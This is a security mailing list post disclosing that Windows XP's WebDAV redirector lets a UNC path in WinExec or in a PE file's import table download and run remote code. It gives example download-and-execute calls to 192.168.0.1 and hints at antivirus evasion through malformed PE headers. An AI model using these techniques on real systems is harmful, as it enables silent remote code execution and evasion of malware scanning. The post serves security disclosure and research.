UNC imports in PE files

[Solar Eclipse <solareclipse () phreedom org>]

Hello list,

Most of you probably know that the WebDAV redirector in Windows XP tries to
resolve UNC paths from all applications with WebDAV requests on port 80. This
means that instead of calling URLDownloadToFile("http://192.168.0.1/foo.exe";)
and then WinExec, you can do just WinExec("\\192.168.0.1\foo.exe")

What you probably don't know is that you can use a full UNC path instead of a
DLL name in the import section of a PE file. When the file is executed, the
loader will try to access the imported DLL using the UNC path and the WebDAV
redirector will download the DLL from the Internet.

It is getting increasingly harder to draw (and defend) the boundaries between
the local machine, the local network and the the Internet.

Check out http://www.phreedom.org/solar/code/tinype/ for the source code of a
137 byte PE file that downloads a DLL over WebDAV and executes the payload in
its DllMain function. The PE file doesn't even have to contain any code,
because DllMain is executed before the entry point of the executable.

The page also has detailed information about hacking the PE header and building
the smallest possible PE file that can be executed on Windows. Its size is only
97 bytes.

If anybody is really bored, feel free to check how many anti-virus products
have PE parsers that don't handle the header of the 97 byte PE file properly
and fail to unpack and scan the code in the file.


Good night and good luck,
Solar Eclipse

Attachment: _bin
Description:

_______________________________________________
Dailydave mailing list
Dailydave () lists immunitysec com
http://lists.immunitysec.com/mailman/listinfo/dailydave